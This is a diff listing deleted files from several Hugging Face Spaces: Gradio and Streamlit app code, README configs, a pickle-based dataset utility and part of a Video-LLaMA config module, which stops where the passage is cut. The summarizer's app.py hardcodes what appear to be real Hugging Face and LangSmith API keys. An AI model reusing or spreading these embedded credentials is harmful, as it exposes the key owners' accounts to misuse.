|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/monoscene_lite/README.md
DELETED
@@ -1,13 +0,0 @@
|
|
1 |
-
---
|
2 |
-
title: MonoScene lite
|
3 |
-
emoji: 🚘🏙️
|
4 |
-
colorFrom: purple
|
5 |
-
colorTo: pink
|
6 |
-
sdk: gradio
|
7 |
-
sdk_version: 3.0.20
|
8 |
-
app_file: app.py
|
9 |
-
pinned: true
|
10 |
-
license: apache-2.0
|
11 |
-
---
|
12 |
-
|
13 |
-
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CazimirRoman/summarize-your-webpage-api-with-gradio/app.py
DELETED
@@ -1,35 +0,0 @@
|
|
1 |
-
import gradio
|
2 |
-
import os
|
3 |
-
|
4 |
-
from langchain.chains.question_answering import load_qa_chain
|
5 |
-
from langchain.document_loaders import UnstructuredURLLoader
|
6 |
-
from langchain import HuggingFaceHub
|
7 |
-
|
8 |
-
os.environ["HUGGINGFACEHUB_API_TOKEN"] = "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"
|
9 |
-
|
10 |
-
llm = HuggingFaceHub(repo_id="declare-lab/flan-alpaca-large", model_kwargs={"temperature":0.1, "max_length":512})
|
11 |
-
|
12 |
-
os.environ["LANGCHAIN_TRACING_V2"] = "true"
|
13 |
-
os.environ["LANGCHAIN_ENDPOINT"] = "https://api.smith.langchain.com"
|
14 |
-
os.environ["LANGCHAIN_API_KEY"] = "ls__ae9b316f4ee9475b84f66c616344d713"
|
15 |
-
os.environ["LANGCHAIN_PROJECT"] = "Sequential-Chain"
|
16 |
-
|
17 |
-
def main():
|
18 |
-
|
19 |
-
gradio_interface = gradio.Interface(
|
20 |
-
fn = my_inference_function,
|
21 |
-
inputs = "text",
|
22 |
-
outputs = "text")
|
23 |
-
|
24 |
-
gradio_interface.launch()
|
25 |
-
|
26 |
-
|
27 |
-
def my_inference_function(url):
|
28 |
-
loader = UnstructuredURLLoader(urls=[url])
|
29 |
-
data = loader.load()
|
30 |
-
chain = load_qa_chain(llm=llm, chain_type="stuff")
|
31 |
-
response = chain.run(input_documents=data, question="Summarize this article in one paragraph")
|
32 |
-
return response
|
33 |
-
|
34 |
-
if __name__ == '__main__':
|
35 |
-
main()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Chatop/Lab10/README.md
DELETED
@@ -1,13 +0,0 @@
|
|
1 |
-
---
|
2 |
-
title: Lab10
|
3 |
-
emoji: 📊
|
4 |
-
colorFrom: red
|
5 |
-
colorTo: red
|
6 |
-
sdk: streamlit
|
7 |
-
sdk_version: 1.10.0
|
8 |
-
app_file: app.py
|
9 |
-
pinned: false
|
10 |
-
license: cc-by-4.0
|
11 |
-
---
|
12 |
-
|
13 |
-
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/ChrisPreston/diff-svc_minato_aqua/utils/indexed_datasets.py
DELETED
@@ -1,73 +0,0 @@
|
|
1 |
-
import pickle
|
2 |
-
from copy import deepcopy
|
3 |
-
|
4 |
-
import numpy as np
|
5 |
-
|
6 |
-
|
7 |
-
class IndexedDataset:
|
8 |
-
def __init__(self, path, num_cache=1):
|
9 |
-
super().__init__()
|
10 |
-
self.path = path
|
11 |
-
self.data_file = None
|
12 |
-
self.data_offsets = np.load(f"{path}.idx", allow_pickle=True).item()['offsets']
|
13 |
-
self.data_file = open(f"{path}.data", 'rb', buffering=-1)
|
14 |
-
self.cache = []
|
15 |
-
self.num_cache = num_cache
|
16 |
-
|
17 |
-
def check_index(self, i):
|
18 |
-
if i < 0 or i >= len(self.data_offsets) - 1:
|
19 |
-
raise IndexError('index out of range')
|
20 |
-
|
21 |
-
def __del__(self):
|
22 |
-
if self.data_file:
|
23 |
-
self.data_file.close()
|
24 |
-
|
25 |
-
def __getitem__(self, i):
|
26 |
-
self.check_index(i)
|
27 |
-
if self.num_cache > 0:
|
28 |
-
for c in self.cache:
|
29 |
-
if c[0] == i:
|
30 |
-
return c[1]
|
31 |
-
self.data_file.seek(self.data_offsets[i])
|
32 |
-
b = self.data_file.read(self.data_offsets[i + 1] - self.data_offsets[i])
|
33 |
-
item = pickle.loads(b)
|
34 |
-
if self.num_cache > 0:
|
35 |
-
self.cache = [(i, deepcopy(item))] + self.cache[:-1]
|
36 |
-
return item
|
37 |
-
|
38 |
-
def __len__(self):
|
39 |
-
return len(self.data_offsets) - 1
|
40 |
-
|
41 |
-
|
42 |
-
class IndexedDatasetBuilder:
|
43 |
-
def __init__(self, path):
|
44 |
-
self.path = path
|
45 |
-
self.out_file = open(f"{path}.data", 'wb')
|
46 |
-
self.byte_offsets = [0]
|
47 |
-
|
48 |
-
def add_item(self, item):
|
49 |
-
s = pickle.dumps(item)
|
50 |
-
bytes = self.out_file.write(s)
|
51 |
-
self.byte_offsets.append(self.byte_offsets[-1] + bytes)
|
52 |
-
|
53 |
-
def finalize(self):
|
54 |
-
self.out_file.close()
|
55 |
-
np.save(open(f"{self.path}.idx", 'wb'), {'offsets': self.byte_offsets})
|
56 |
-
|
57 |
-
|
58 |
-
if __name__ == "__main__":
|
59 |
-
import random
|
60 |
-
from tqdm import tqdm
|
61 |
-
|
62 |
-
ds_path = '/tmp/indexed_ds_example'
|
63 |
-
size = 100
|
64 |
-
items = [{"a": np.random.normal(size=[10000, 10]),
|
65 |
-
"b": np.random.normal(size=[10000, 10])} for i in range(size)]
|
66 |
-
builder = IndexedDatasetBuilder(ds_path)
|
67 |
-
for i in tqdm(range(size)):
|
68 |
-
builder.add_item(items[i])
|
69 |
-
builder.finalize()
|
70 |
-
ds = IndexedDataset(ds_path)
|
71 |
-
for i in tqdm(range(10000)):
|
72 |
-
idx = random.randint(0, size - 1)
|
73 |
-
assert (ds[idx]['a'] == items[idx]['a']).all()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/ClearLove443/Robby-chatbot/modules/layout.py
DELETED
@@ -1,44 +0,0 @@
|
|
1 |
-
import streamlit as st
|
2 |
-
|
3 |
-
class Layout:
|
4 |
-
|
5 |
-
def show_header(self, types_files):
|
6 |
-
"""
|
7 |
-
Displays the header of the app
|
8 |
-
"""
|
9 |
-
st.markdown(
|
10 |
-
f"""
|
11 |
-
<h1 style='text-align: center;'> Ask Robby about your {types_files} files ! 😁</h1>
|
12 |
-
""",
|
13 |
-
unsafe_allow_html=True,
|
14 |
-
)
|
15 |
-
|
16 |
-
def show_api_key_missing(self):
|
17 |
-
"""
|
18 |
-
Displays a message if the user has not entered an API key
|
19 |
-
"""
|
20 |
-
st.markdown(
|
21 |
-
"""
|
22 |
-
<div style='text-align: center;'>
|
23 |
-
<h4>Enter your <a href="https://platform.openai.com/account/api-keys" target="_blank">OpenAI API key</a> to start chatting</h4>
|
24 |
-
</div>
|
25 |
-
""",
|
26 |
-
unsafe_allow_html=True,
|
27 |
-
)
|
28 |
-
|
29 |
-
def prompt_form(self):
|
30 |
-
"""
|
31 |
-
Displays the prompt form
|
32 |
-
"""
|
33 |
-
with st.form(key="my_form", clear_on_submit=True):
|
34 |
-
user_input = st.text_area(
|
35 |
-
"Query:",
|
36 |
-
placeholder="Ask me anything about the document...",
|
37 |
-
key="input",
|
38 |
-
label_visibility="collapsed",
|
39 |
-
)
|
40 |
-
submit_button = st.form_submit_button(label="Send")
|
41 |
-
|
42 |
-
is_ready = submit_button and user_input
|
43 |
-
return is_ready, user_input
|
44 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CognitiveLabs/Research-Assistant/processing/text.py
DELETED
@@ -1,18 +0,0 @@
|
|
1 |
-
"""Text processing functions"""
|
2 |
-
from typing import Dict, Generator
|
3 |
-
|
4 |
-
from config import Config
|
5 |
-
import os
|
6 |
-
|
7 |
-
CFG = Config()
|
8 |
-
|
9 |
-
|
10 |
-
def read_txt_files(directory):
|
11 |
-
all_text = ''
|
12 |
-
|
13 |
-
for filename in os.listdir(directory):
|
14 |
-
if filename.endswith('.txt'):
|
15 |
-
with open(os.path.join(directory, filename), 'r') as file:
|
16 |
-
all_text += file.read() + '\n'
|
17 |
-
|
18 |
-
return all_text
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/DAMO-NLP-SG/Video-LLaMA/video_llama/common/config.py
DELETED
@@ -1,468 +0,0 @@
|
|
1 |
-
"""
|
2 |
-
Copyright (c) 2022, salesforce.com, inc.
|
3 |
-
All rights reserved.
|
4 |
-
SPDX-License-Identifier: BSD-3-Clause
|
5 |
-
For full license text, see the LICENSE_Lavis file in the repo root or https://opensource.org/licenses/BSD-3-Clause
|
6 |
-
"""
|
7 |
-
|
8 |
-
import logging
|
9 |
-
import json
|
10 |
-
from typing import Dict
|
11 |
-
|
12 |
-
from omegaconf import OmegaConf
|
13 |
-
from video_llama.common.registry import registry
|
14 |
-
|
15 |
-
|
16 |
-
class Config:
|
17 |
-
def __init__(self, args):
|
18 |
-
self.config = {}
|
19 |
-
|
20 |
-
self.args = args
|
21 |
-
|
22 |
-
# Register the config and configuration for setup
|
23 |
-
registry.register("configuration", self)
|
24 |
-
|
25 |
-
user_config = self._build_opt_list(self.args.options)
|
26 |
-
|
27 |
-
config = OmegaConf.load(self.args.cfg_path)
|
28 |
-
|
29 |
-
runner_config = self.build_runner_config(config)
|
30 |
-
model_config = self.build_model_config(config, **user_config)
|
31 |
-
dataset_config = self.build_dataset_config(config)
|
32 |
-
|
33 |
-
# Validate the user-provided runner configuration
|
34 |
-
# model and dataset configuration are supposed to be validated by the respective classes
|
35 |
-
# [TODO] validate the model/dataset configuration
|
36 |
-
# self._validate_runner_config(runner_config)
|
37 |
-
|
38 |
-
# Override the default configuration with user options.
|
39 |
-
self.config = OmegaConf.merge(
|
40 |
-
runner_config, model_config, dataset_config, user_config
|
41 |
-
)
|
42 |
-
|
43 |
-
def _validate_runner_config(self, runner_config):
|
44 |
-
"""
|
45 |
-
This method validates the configuration, such that
|
46 |
-
1) all the user specified options are valid;
|
47 |
-
2) no type mismatches between the user specified options and the config.
|
48 |
-
"""
|
49 |
-
runner_config_validator = create_runner_config_validator()
|
50 |
-
runner_config_validator.validate(runner_config)
|
51 |
-
|
52 |
-
def _build_opt_list(self, opts):
|
53 |
-
opts_dot_list = self._convert_to_dot_list(opts)
|
54 |
-
return OmegaConf.from_dotlist(opts_dot_list)
|
55 |
-
|
56 |
-
@staticmethod
|
57 |
-
def build_model_config(config, **kwargs):
|
58 |
-
model = config.get("model", None)
|
59 |
-
assert model is not None, "Missing model configuration file."
|
60 |
-
|
61 |
-
model_cls = registry.get_model_class(model.arch)
|
62 |
-
assert model_cls is not None, f"Model '{model.arch}' has not been registered."
|
63 |
-
|
64 |
-
model_type = kwargs.get("model.model_type", None)
|
65 |
-
if not model_type:
|
66 |
-
model_type = model.get("model_type", None)
|
67 |
-
# else use the model type selected by user.
|
68 |
-
|
69 |
-
assert model_type is not None, "Missing model_type."
|
70 |
-
|
71 |
-
model_config_path = model_cls.default_config_path(model_type=model_type)
|
72 |
-
|
73 |
-
model_config = OmegaConf.create()
|
74 |
-
# hierarchy override, customized config > default config
|
75 |
-
model_config = OmegaConf.merge(
|
76 |
-
model_config,
|
77 |
-
OmegaConf.load(model_config_path),
|
78 |
-
{"model": config["model"]},
|
79 |
-
)
|
80 |
-
|
81 |
-
return model_config
|
82 |
-
|
83 |
-
@staticmethod
|
84 |
-
def build_runner_config(config):
|
85 |
-
return {"run": config.run}
|
86 |
-
|
87 |
-
@staticmethod
|
88 |
-
def build_dataset_config(config):
|
89 |
-
datasets = config.get("datasets", None)
|
90 |
-
if datasets is None:
|
91 |
-
raise KeyError(
|
92 |
-
"Expecting 'datasets' as the root key for dataset configuration."
|
93 |
-
)
|
94 |
-
|
95 |
-
dataset_config = OmegaConf.create()
|
96 |
-
|
97 |
-
for dataset_name in datasets:
|
98 |
-
builder_cls = registry.get_builder_class(dataset_name)
|
99 |
-
|
100 |
-
dataset_config_type = datasets[dataset_name].get("type", "default")
|
101 |
-
dataset_config_path = builder_cls.default_config_path(
|
102 |
-
type=dataset_config_type
|
103 |
-
)
|
104 |
-
|
105 |
-
# hierarchy override, customized config > default config
|
106 |
-
dataset_config = OmegaConf.merge(
|
107 |
-
dataset_config,
|
108 |
-
OmegaConf.load(dataset_config_path),
|
109 |
-
{"datasets": {dataset_name: config["datasets"][dataset_name]}},
|
110 |
-
)
|
111 |
-
|
112 |
-
return dataset_config
|
113 |
-
|
114 |
-
def _convert_to_dot_list(self, opts):
|
115 |
-
if opts is None:
|
116 |
-
opts = []
|
117 |
-
|
118 |
-
if len(opts) == 0:
|
119 |
-
return opts
|
120 |
-
|
121 |
-
has_equal = opts[0].find("=") != -1
|
122 |
-
|
123 |
-
if has_equal:
|
124 |
-
return opts
|
125 |
-
|
126 |
-
return [(opt + "=" + value) for opt, value in zip(opts[0::2], opts[1::2])]
|
127 |
-
|
128 |
-
def get_config(self):
|
129 |
-
return self.config
|
130 |
-
|
131 |
-
@property
|
132 |
-
def run_cfg(self):
|
133 |
-
return self.config.run
|
134 |
-
|
135 |
-
@property
|
136 |
-
def datasets_cfg(self):
|
137 |
-
return self.config.datasets
|
138 |
-
|
139 |
-
@property
|
140 |
-
def model_cfg(self):
|
141 |
-
return self.config.model
|
142 |
-
|
143 |
-
def pretty_print(self):
|
144 |
-
logging.info("\n===== Running Parameters =====")
|
145 |
-
logging.info(self._convert_node_to_json(self.config.run))
|
146 |
-
|
147 |
-
logging.info("\n====== Dataset Attributes ======")
|
148 |
-
datasets = self.config.datasets
|
149 |
-
|
150 |
-
for dataset in datasets:
|
151 |
-
if dataset in self.config.datasets:
|
152 |
-
logging.info(f"\n======== {dataset} =======")
|
153 |
-
dataset_config = self.config.datasets[dataset]
|
154 |
-
logging.info(self._convert_node_to_json(dataset_config))
|
155 |
-
else:
|
156 |
-
logging.warning(f"No dataset named '{dataset}' in config. Skipping")
|
157 |
-
|
158 |
-
logging.info(f"\n====== Model Attributes ======")
|
159 |
-
logging.info(self._convert_node_to_json(self.config.model))
|
160 |
-
|
161 |
-
def _convert_node_to_json(self, node):
|
162 |
-
container = OmegaConf.to_container(node, resolve=True)
|
163 |
-
return json.dumps(container, indent=4, sort_keys=True)
|
164 |
-
|
165 |
-
def to_dict(self):
|
166 |
-
return OmegaConf.to_container(self.config)
|
167 |
-
|
168 |
-
|
169 |
-
def node_to_dict(node):
|
170 |
-
return OmegaConf.to_container(node)
|
171 |
-
|
172 |
-
|
173 |
-
class ConfigValidator:
|
174 |
-
"""
|
175 |
-
This is a preliminary implementation to centralize and validate the configuration.
|
176 |
-
May be altered in the future.
|
177 |
-
|
178 |
-
A helper class to validate configurations from yaml file.
|
179 |
-
|
180 |
-
This serves the following purposes:
|
181 |
-
1. Ensure all the options in the yaml are defined, raise error if not.
|
182 |
-
2. when type mismatches are found, the validator will raise an error.
|
183 |
-
3. a central place to store and display helpful messages for supported configurations.
|
184 |
-
|
185 |
-
"""
|
186 |
-
|
187 |
-
class _Argument:
|
188 |
-
def __init__(self, name, choices=None, type=None, help=None):
|
189 |
-
self.name = name
|
190 |
-
self.val = None
|
191 |
-
self.choices = choices
|
192 |
-
self.type = type
|
193 |
-
self.help = help
|
194 |
-
|
195 |
-
def __str__(self):
|
196 |
-
s = f"{self.name}={self.val}"
|
197 |
-
if self.type is not None:
|
198 |
-
s += f", ({self.type})"
|
199 |
-
if self.choices is not None:
|
200 |
-
s += f", choices: {self.choices}"
|
201 |
-
if self.help is not None:
|
202 |
-
s += f", ({self.help})"
|
203 |
-
return s
|
204 |
-
|
205 |
-
def __init__(self, description):
|
206 |
-
self.description = description
|
207 |
-
|
208 |
-
self.arguments = dict()
|
209 |
-
|
210 |
-
self.parsed_args = None
|
211 |
-
|
212 |
-
def __getitem__(self, key):
|
213 |
-
assert self.parsed_args is not None, "No arguments parsed yet."
|
214 |
-
|
215 |
-
return self.parsed_args[key]
|
216 |
-
|
217 |
-
def __str__(self) -> str:
|
218 |
-
return self.format_help()
|
219 |
-
|
220 |
-
def add_argument(self, *args, **kwargs):
|
221 |
-
"""
|
222 |
-
Assume the first argument is the name of the argument.
|
223 |
-
"""
|
224 |
-
self.arguments[args[0]] = self._Argument(*args, **kwargs)
|
225 |
-
|
226 |
-
def validate(self, config=None):
|
227 |
-
"""
|
228 |
-
Convert yaml config (dict-like) to list, required by argparse.
|
229 |
-
"""
|
230 |
-
for k, v in config.items():
|
231 |
-
assert (
|
232 |
-
k in self.arguments
|
233 |
-
), f"""{k} is not a valid argument. Support arguments are {self.format_arguments()}."""
|
234 |
-
|
235 |
-
if self.arguments[k].type is not None:
|
236 |
-
try:
|
237 |
-
self.arguments[k].val = self.arguments[k].type(v)
|
238 |
-
except ValueError:
|
239 |
-
raise ValueError(f"{k} is not a valid {self.arguments[k].type}.")
|
240 |
-
|
241 |
-
if self.arguments[k].choices is not None:
|
242 |
-
assert (
|
243 |
-
v in self.arguments[k].choices
|
244 |
-
), f"""{k} must be one of {self.arguments[k].choices}."""
|
245 |
-
|
246 |
-
return config
|
247 |
-
|
248 |
-
def format_arguments(self):
|
249 |
-
return str([f"{k}" for k in sorted(self.arguments.keys())])
|
250 |
-
|
251 |
-
def format_help(self):
|
252 |
-
# description + key-value pair string for each argument
|
253 |
-
help_msg = str(self.description)
|
254 |
-
return help_msg + ", available arguments: " + self.format_arguments()
|
255 |
-
|
256 |
-
def print_help(self):
|
257 |
-
# display help message
|
258 |
-
print(self.format_help())
|
259 |
-
|
260 |
-
|
261 |
-
def create_runner_config_validator():
|
262 |
-
validator = ConfigValidator(description="Runner configurations")
|
263 |
-
|
264 |
-
validator.add_argument(
|
265 |
-
"runner",
|
266 |
-
type=str,
|
267 |
-
choices=["runner_base", "runner_iter"],
|
268 |
-
help="""Runner to use. The "runner_base" uses epoch-based training while iter-based
|
269 |
-
runner runs based on iters. Default: runner_base""",
|
270 |
-
)
|
271 |
-
# add argumetns for training dataset ratios
|
272 |
-
validator.add_argument(
|
273 |
-
"train_dataset_ratios",
|
274 |
-
type=Dict[str, float],
|
275 |
-
help="""Ratios of training dataset. This is used in iteration-based runner.
|
276 |
-
Do not support for epoch-based runner because how to define an epoch becomes tricky.
|
277 |
-
Default: None""",
|
278 |
-
)
|
279 |
-
validator.add_argument(
|
280 |
-
"max_iters",
|
281 |
-
type=float,
|
282 |
-
help="Maximum number of iterations to run.",
|
283 |
-
)
|
284 |
-
validator.add_argument(
|
285 |
-
"max_epoch",
|
286 |
-
type=int,
|
287 |
-
help="Maximum number of epochs to run.",
|
288 |
-
)
|
289 |
-
# add arguments for iters_per_inner_epoch
|
290 |
-
validator.add_argument(
|
291 |
-
"iters_per_inner_epoch",
|
292 |
-
type=float,
|
293 |
-
help="Number of iterations per inner epoch. This is required when runner is runner_iter.",
|
294 |
-
)
|
295 |
-
lr_scheds_choices = registry.list_lr_schedulers()
|
296 |
-
validator.add_argument(
|
297 |
-
"lr_sched",
|
298 |
-
type=str,
|
299 |
-
choices=lr_scheds_choices,
|
300 |
-
help="Learning rate scheduler to use, from {}".format(lr_scheds_choices),
|
301 |
-
)
|
302 |
-
task_choices = registry.list_tasks()
|
303 |
-
validator.add_argument(
|
304 |
-
"task",
|
305 |
-
type=str,
|
306 |
-
choices=task_choices,
|
307 |
-
help="Task to use, from {}".format(task_choices),
|
308 |
-
)
|
309 |
-
# add arguments for init_lr
|
310 |
-
validator.add_argument(
|
311 |
-
"init_lr",
|
312 |
-
type=float,
|
313 |
-
help="Initial learning rate. This will be the learning rate after warmup and before decay.",
|
314 |
-
)
|
315 |
-
# add arguments for min_lr
|
316 |
-
validator.add_argument(
|
317 |
-
"min_lr",
|
318 |
-
type=float,
|
319 |
-
help="Minimum learning rate (after decay).",
|
320 |
-
)
|
321 |
-
# add arguments for warmup_lr
|
322 |
-
validator.add_argument(
|
323 |
-
"warmup_lr",
|
324 |
-
type=float,
|
325 |
-
help="Starting learning rate for warmup.",
|
326 |
-
)
|
327 |
-
# add arguments for learning rate decay rate
|
328 |
-
validator.add_argument(
|
329 |
-
"lr_decay_rate",
|
330 |
-
type=float,
|
331 |
-
help="Learning rate decay rate. Required if using a decaying learning rate scheduler.",
|
332 |
-
)
|
333 |
-
# add arguments for weight decay
|
334 |
-
validator.add_argument(
|
335 |
-
"weight_decay",
|
336 |
-
type=float,
|
337 |
-
help="Weight decay rate.",
|
338 |
-
)
|
339 |
-
# add arguments for training batch size
|
340 |
-
validator.add_argument(
|
341 |
-
"batch_size_train",
|
342 |
-
type=int,
|
343 |
-
help="Training batch size.",
|
344 |
-
)
|
345 |
-
# add arguments for evaluation batch size
|
346 |
-
validator.add_argument(
|
347 |
-
"batch_size_eval",
|
348 |
-
type=int,
|
349 |
-
help="Evaluation batch size, including validation and testing.",
|
350 |
-
)
|
351 |
-
# add arguments for number of workers for data loading
|
352 |
-
validator.add_argument(
|
353 |
-
"num_workers",
|
354 |
-
help="Number of workers for data loading.",
|
355 |
-
)
|
356 |
-
# add arguments for warm up steps
|
357 |
-
validator.add_argument(
|
358 |
-
"warmup_steps",
|
359 |
-
type=int,
|
360 |
-
help="Number of warmup steps. Required if a warmup schedule is used.",
|
